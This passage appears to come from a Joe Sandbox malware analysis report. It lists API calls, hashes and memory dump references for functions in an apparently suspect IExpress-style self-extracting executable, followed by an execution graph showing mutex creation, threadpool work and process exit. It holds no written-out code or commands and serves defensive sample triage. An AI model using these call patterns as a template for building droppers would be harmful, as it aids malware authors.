                                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 003E64DF
                                                                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 003E64F9
                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 003E6502
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$advpack.dll
                                                                                                                                                                                                                                                            • API String ID: 438848745-3736221019
                                                                                                                                                                                                                                                            • Opcode ID: f0aece4b4ed8d727e5be5a1e8b28bfbad66261fa5b39565b45626d29faaed4fa
                                                                                                                                                                                                                                                            • Instruction ID: 99639795895808fc00c286c6ba577af4e67db6b462750ea0f8048f616bece595
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f0aece4b4ed8d727e5be5a1e8b28bfbad66261fa5b39565b45626d29faaed4fa
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E601F930A00198ABD761EB66DC8AFEE737CDB61311F500395F585961C0DFB0AE85CB51
                                                                                                                                                                                                                                                            Function 003E7155 Relevance: 7.6, APIs: 5, Instructions: 51timethreadCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 003E7182
                                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 003E7191
                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 003E719A
                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 003E71A3
                                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 003E71B8
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1445889803-0
                                                                                                                                                                                                                                                            • Opcode ID: fcca34895efc590a2f126a15203552fc7d626c260094b1255e8664b7c013e74d
                                                                                                                                                                                                                                                            • Instruction ID: fccdb995e60cd35e2682861002ab31a95581e17f325b89ac1d1561aaa9cd90ad
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fcca34895efc590a2f126a15203552fc7d626c260094b1255e8664b7c013e74d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 72115171D05648EFCB21DFB8DA8869EB7F8FF48311F514A55E405EB290DB309E048B41
                                                                                                                                                                                                                                                            Function 003E19E0 Relevance: 7.6, APIs: 5, Instructions: 51windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • EndDialog.USER32(?,?), ref: 003E1A18
                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 003E1A24
                                                                                                                                                                                                                                                            • LoadStringA.USER32(?,?,00000200), ref: 003E1A4F
                                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 003E1A62
                                                                                                                                                                                                                                                            • MessageBeep.USER32(000000FF), ref: 003E1A6A
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1273765764-0
                                                                                                                                                                                                                                                            • Opcode ID: 45767a7d410342790929b150cfe5fb666f8699832f78d3381b35b8935800f814
                                                                                                                                                                                                                                                            • Instruction ID: 6ec4a767b054a3ee3b7ad774a9af41407b28cb22d089a302376446464cedc646
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 45767a7d410342790929b150cfe5fb666f8699832f78d3381b35b8935800f814
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8F11E1315001A9AFCB22EF64DE48ABE77BCEF09300F108364F9129A1D0CA30AE10CB91
                                                                                                                                                                                                                                                            Function 003E63C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 003E642D
                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 003E645B
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 003E647A
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 003E63EB
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                                                                            • API String ID: 1065093856-1610346413
                                                                                                                                                                                                                                                            • Opcode ID: 53ac05ddb711f1ad57522c1f7041f70bd847ed85beffd128f735b461078028d7
                                                                                                                                                                                                                                                            • Instruction ID: 12f71d16ad516155eb9fd923a9925487b9d103bc5993f4c25c2eeb545e040462
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 53ac05ddb711f1ad57522c1f7041f70bd847ed85beffd128f735b461078028d7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4221F371A0026CABC722DF26DCC6FEA736CEB54350F000369F584AB2C0CAB06D848F60
                                                                                                                                                                                                                                                            Function 003E47E0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,003E4E6F), ref: 003E47EA
                                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 003E4823
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 003E4847
                                                                                                                                                                                                                                                              • Part of subcall function 003E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 003E4518
                                                                                                                                                                                                                                                              • Part of subcall function 003E44B9: MessageBoxA.USER32(?,?,valid,00010010), ref: 003E4554
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 003E4851
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                                                                            • API String ID: 359063898-1610346413
                                                                                                                                                                                                                                                            • Opcode ID: c970cf45844b762724a81cccf569d1a1231935ee7c2abbc6bdadebc1bc033a42
                                                                                                                                                                                                                                                            • Instruction ID: faeefeda74631cd55a5e42d187cdd5ff881f625e52187f7964b7d256b9522b0f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c970cf45844b762724a81cccf569d1a1231935ee7c2abbc6bdadebc1bc033a42
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CA1106B56046D16FEB278F259C58F763B5EEB89300F058719E9828F3C1DA369C068760
                                                                                                                                                                                                                                                            Function 003E4980 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 62stringCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(00008000,*MEMCAB,00000000,CABINET,?,003E4F67,*MEMCAB,00008000,00000180), ref: 003E49CA
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: lstrcmp
                                                                                                                                                                                                                                                            • String ID: *MEMCAB$CABINET$zI6
                                                                                                                                                                                                                                                            • API String ID: 1534048567-1641303110
                                                                                                                                                                                                                                                            • Opcode ID: e2375458cb1f6b6bb36f65da0f96be3988f3591373dc7e16283784bb7a691ae5
                                                                                                                                                                                                                                                            • Instruction ID: 39ae40f9a6f88d72fa7c3b417f546c7eb749cb81d1b42dd2230c1a722bb1a522
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e2375458cb1f6b6bb36f65da0f96be3988f3591373dc7e16283784bb7a691ae5
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E11C631A401E88EC3279F1BDC586163A99FB95730B15436AF42C9F2E2CB718C03D785
                                                                                                                                                                                                                                                            Function 003E3680 Relevance: 6.1, APIs: 4, Instructions: 51windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 003E369F
                                                                                                                                                                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 003E36B2
                                                                                                                                                                                                                                                            • DispatchMessageA.USER32(?), ref: 003E36CB
                                                                                                                                                                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 003E36DA
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2776232527-0
                                                                                                                                                                                                                                                            • Opcode ID: d20d6c340bb21513f9284b7685a717c2aafe4fd287947ab5f6d92815c30b0515
                                                                                                                                                                                                                                                            • Instruction ID: 446976230b3780eb12b2ccbde7098d10c50dfcb85234634078d11989fc5340d6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d20d6c340bb21513f9284b7685a717c2aafe4fd287947ab5f6d92815c30b0515
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 930184729002A4B7DB314AA75C8CEEB7B7CEB85B10F010319B905E72C0D5719640C660
                                                                                                                                                                                                                                                            Function 003E65E8 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,003E2B33), ref: 003E6602
                                                                                                                                                                                                                                                            • CharPrevA.USER32(?,00000000), ref: 003E6612
                                                                                                                                                                                                                                                            • CharPrevA.USER32(?,00000000), ref: 003E6629
                                                                                                                                                                                                                                                            • CharNextA.USER32(00000000), ref: 003E6635
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Char$Prev$Next
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3260447230-0
                                                                                                                                                                                                                                                            • Opcode ID: eab203f2fb9f62c6848620436e979ce0628a41b5d9c30255b9a49835b47f026e
                                                                                                                                                                                                                                                            • Instruction ID: a0e7a331eb366b2f1f05883e86898734f6cdfd13b1bc3003d520270768913044
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eab203f2fb9f62c6848620436e979ce0628a41b5d9c30255b9a49835b47f026e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 88F02D310045E06ED7331B2A4CC89BBBF9CDFE7394F1A436FE4D596081D7150D068661
                                                                                                                                                                                                                                                            Function 003E69B0 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 003E6FBE: GetModuleHandleW.KERNEL32(00000000,?,003E69C1,00000002), ref: 003E6FC5
                                                                                                                                                                                                                                                            • __set_app_type.MSVCRT ref: 003E69C2
                                                                                                                                                                                                                                                            • __p__fmode.MSVCRT ref: 003E69D8
                                                                                                                                                                                                                                                            • __p__commode.MSVCRT ref: 003E69E6
                                                                                                                                                                                                                                                            • __setusermatherr.MSVCRT ref: 003E6A07
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1632413811-0
                                                                                                                                                                                                                                                            • Opcode ID: 7702c99b0caeb8733f0327b6fbcf20895ec80062d65f788f8f081894c5994c27
                                                                                                                                                                                                                                                            • Instruction ID: 151f52186dafa072403e720cbf19d9dfb81856eeb6fea9328a888fbe53b31314
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7702c99b0caeb8733f0327b6fbcf20895ec80062d65f788f8f081894c5994c27
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6AF0F8B09087D18FC777AB31ED8A6043B6AFB05321F100B19E465AE2E1CF3A95418A11
                                                                                                                                                                                                                                                            Function 003E6952 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetDiskFreeSpaceA.KERNEL32(0000005A,?,?,`W>,?,00000000,003E5760,?,A:\), ref: 003E697F
                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,?,00000400), ref: 003E6999
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DiskFreeSpace
                                                                                                                                                                                                                                                            • String ID: `W>
                                                                                                                                                                                                                                                            • API String ID: 1705453755-2198717450
                                                                                                                                                                                                                                                            • Opcode ID: 723da3a829c274cebaf179e7f918ed6f2aeb0a00b6362a625fc983e07e8dcf01
                                                                                                                                                                                                                                                            • Instruction ID: 10ed2ecff7cec92dbfd5641e249289b89f3045a029944e7d8bc0a411aa4ba9f3
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 723da3a829c274cebaf179e7f918ed6f2aeb0a00b6362a625fc983e07e8dcf01
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0EF0E7B6D00268BBCB12DFE98C45ADEBBBCEB48700F104696B510E6280D671AA008B91

                                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                                            Execution Coverage:4%
                                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                            Signature Coverage:2.1%
                                                                                                                                                                                                                                                            Total number of Nodes:754
                                                                                                                                                                                                                                                            Total number of Limit Nodes:13
                                                                                                                                                                                                                                                            execution_graph 12184 6b9ae9 12185 6ba917 12184->12185 12188 6b9afe shared_ptr 12184->12188 12186 6ba953 Sleep CreateMutexA 12185->12186 12187 6ba98e 12186->12187 12188->12185 12189 6b9b4b shared_ptr 12188->12189 12190 6b5c10 6 API calls 12189->12190 12191 6b9b59 12189->12191 12192 6b9b7c 12190->12192 12199 6b8b30 12192->12199 12194 6b9b8d 12195 6b5c10 6 API calls 12194->12195 12196 6b9cb1 12195->12196 12197 6b8b30 6 API calls 12196->12197 12198 6b9cc2 12197->12198 12200 6b8b7c 12199->12200 12201 6b5c10 6 API calls 12200->12201 12202 6b8b97 shared_ptr __floor_pentium4 12201->12202 12202->12194 11617 6e6629 11620 6e64c7 11617->11620 11621 6e64d5 __cftof 11620->11621 11622 6e6520 11621->11622 11625 6e652b 11621->11625 11624 6e652a 11631 6ea302 GetPEB 11625->11631 11627 6e6535 11628 6e654a __cftof 11627->11628 11629 6e653a GetPEB 11627->11629 11630 6e6562 ExitProcess 11628->11630 11629->11628 11632 6ea31c __cftof 11631->11632 11632->11627 11637 6bb1a0 11638 6bb1f2 11637->11638 11639 6bb3ad CoInitialize 11638->11639 11640 6bb3fa shared_ptr __floor_pentium4 11639->11640 12003 6b20a0 12004 6cc68b __Mtx_init_in_situ 2 API calls 12003->12004 12005 6b20ac 12004->12005 12086 6b4120 12087 6b416a 12086->12087 12089 6b41b2 __floor_pentium4 12087->12089 12090 6b3ee0 12087->12090 12091 6b3f48 12090->12091 12092 6b3f1e 12090->12092 12093 6b3f58 12091->12093 12096 6b2c00 12091->12096 12092->12089 12093->12089 12097 6b2c0e 12096->12097 12103 6cb847 12097->12103 12099 6b2c42 12100 6b2c49 12099->12100 12109 6b2c80 12099->12109 12100->12089 12102 6b2c58 std::_Throw_future_error 12104 6cb854 12103->12104 12108 6cb873 Concurrency::details::_Reschedule_chore 12103->12108 12112 6ccb77 12104->12112 12106 6cb864 12106->12108 12114 6cb81e 12106->12114 12108->12099 12120 6cb7fb 12109->12120 12111 6b2cb2 shared_ptr 12111->12102 12113 6ccb92 CreateThreadpoolWork 12112->12113 12113->12106 12115 6cb827 Concurrency::details::_Reschedule_chore 12114->12115 12118 6ccdcc 12115->12118 12117 6cb841 12117->12108 12119 6ccde1 TpPostWork 12118->12119 12119->12117 12121 6cb817 12120->12121 12122 6cb807 12120->12122 12121->12111 12122->12121 12124 6cca78 12122->12124 12125 6cca8d TpReleaseWork 12124->12125 12125->12121 12252 6baf20 12253 6baf63 12252->12253 12264 6e6660 12253->12264 12258 6e663f 4 API calls 12259 6baf80 12258->12259 12260 6e663f 4 API calls 12259->12260 12261 6baf98 __cftof 12260->12261 12270 6b55f0 12261->12270 12263 6bb04e shared_ptr __floor_pentium4 12265 6ea671 __cftof 4 API calls 12264->12265 12266 6baf69 12265->12266 12267 6e663f 12266->12267 12268 6ea671 __cftof 4 API calls 12267->12268 12269 6baf71 12268->12269 12269->12258 12271 6b5610 12270->12271 12273 6b5710 __floor_pentium4 12271->12273 12274 6b22c0 12271->12274 12273->12263 12277 6b2280 12274->12277 12278 6b2296 12277->12278 12281 6e87f8 12278->12281 12284 6e7609 12281->12284 12283 6b22a4 12283->12271 12285 6e7649 12284->12285 12287 6e7631 __cftof __floor_pentium4 12284->12287 12286 6e690a __cftof 4 API calls 12285->12286 12285->12287 12288 6e7661 12286->12288 12287->12283 12290 6e7bc4 12288->12290 12292 6e7bd5 12290->12292 12291 6e7be4 __cftof 12291->12287 12292->12291 12297 6e8168 12292->12297 12302 6e7dc2 12292->12302 12307 6e7de8 12292->12307 12317 6e7f36 12292->12317 12298 6e8171 12297->12298 12300 6e8178 12297->12300 12326 6e7b50 12298->12326 12300->12292 12301 6e8177 12301->12292 12303 6e7dcb 12302->12303 12304 6e7dd2 12302->12304 12305 6e7b50 4 API calls 12303->12305 12304->12292 12306 6e7dd1 12305->12306 12306->12292 12308 6e7e09 __cftof 12307->12308 12311 6e7def 12307->12311 12308->12292 12309 6e7f69 12315 6e7f77 12309->12315 12316 6e7f8b 12309->12316 12334 6e8241 12309->12334 12310 6e7fa2 12310->12316 12330 6e8390 12310->12330 12311->12308 12311->12309 12311->12310 12311->12315 12315->12316 12338 6e86ea 12315->12338 12316->12292 12318 6e7f69 12317->12318 12320 6e7f4f 12317->12320 12321 6e8241 4 API calls 12318->12321 12324 6e7f77 12318->12324 12325 6e7f8b 12318->12325 12319 6e7fa2 12322 6e8390 4 API calls 12319->12322 12319->12325 12320->12318 12320->12319 12320->12324 12321->12324 12322->12324 12323 6e86ea 4 API calls 12323->12325 12324->12323 12324->12325 12325->12292 12327 6e7b62 12326->12327 12328 6e8ab6 4 API calls 12327->12328 12329 6e7b85 12328->12329 12329->12301 12332 6e83ab 12330->12332 12331 6e83dd 12331->12315 12332->12331 12342 6ec88e 12332->12342 12335 6e825a 12334->12335 12349 6ed3c8 12335->12349 12337 6e830d 12337->12315 12337->12337 12340 6e875d __floor_pentium4 12338->12340 12341 6e8707 12338->12341 12339 6ec88e __cftof 4 API calls 12339->12341 12340->12316 12341->12339 12341->12340 12345 6ec733 12342->12345 12344 6ec8a6 12344->12331 12346 6ec743 12345->12346 12347 6e690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 12346->12347 12348 6ec748 __cftof 12346->12348 12347->12348 12348->12344 12350 6ed3d8 __cftof 12349->12350 12351 6ed3ee 12349->12351 12350->12337 12351->12350 12352 6ed485 12351->12352 12353 6ed48a 12351->12353 12355 6ed4ae 12352->12355 12356 6ed4e4 12352->12356 12362 6ecbdf 12353->12362 12357 6ed4cc 12355->12357 12358 6ed4b3 12355->12358 12379 6ecef8 